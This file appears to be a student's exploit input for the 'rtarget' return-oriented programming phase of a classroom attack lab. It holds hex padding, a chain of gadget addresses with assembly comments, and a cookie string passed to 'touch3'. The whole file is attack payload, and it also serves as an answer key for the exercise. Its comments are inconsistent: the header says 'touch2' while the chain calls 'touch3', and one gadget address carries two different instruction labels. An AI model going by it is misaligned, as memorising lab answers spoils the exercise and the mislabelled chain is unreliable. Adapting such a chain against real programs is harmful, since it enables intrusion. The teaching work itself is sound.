/* touch2 for rtarget */
/* padding code */
00 00 00 00
00 00 00 00

00 00 00 00
00 00 00 00

00 00 00 00
00 00 00 00

00 00 00 00
00 00 00 00

00 00 00 00
00 00 00 00
/* ROP addresses */
ab 19 40 00 /* popq %rax */
00 00 00 00

20 00 00 00 /* offset for %rsp */
00 00 00 00

dd 19 40 00 /* movl %eax,%edx */
00 00 00 00

34 1a 40 00 /* movl %edx,%ecx */
00 00 00 00

27 1a 40 00 /* movl %ecx,%esi */
00 00 00 00

06 1a 40 00 /* movq %rsp,%rax */
00 00 00 00

a2 19 40 00 /* movq %rax,%rdx */
00 00 00 00

d6 19 40 00 /* <add-xy> lea (%rdi,%rsi,1),%rax */
00 00 00 00

a2 19 40 00 /* movq %rax,%rdi */
00 00 00 00

fa 18 40 00 /* call touch3 */
00 00 00 00

35 39 62 39 /* cookie string */
39 37 66 61

00 00 00 00 /* tailing zeros */
00 00 00 00
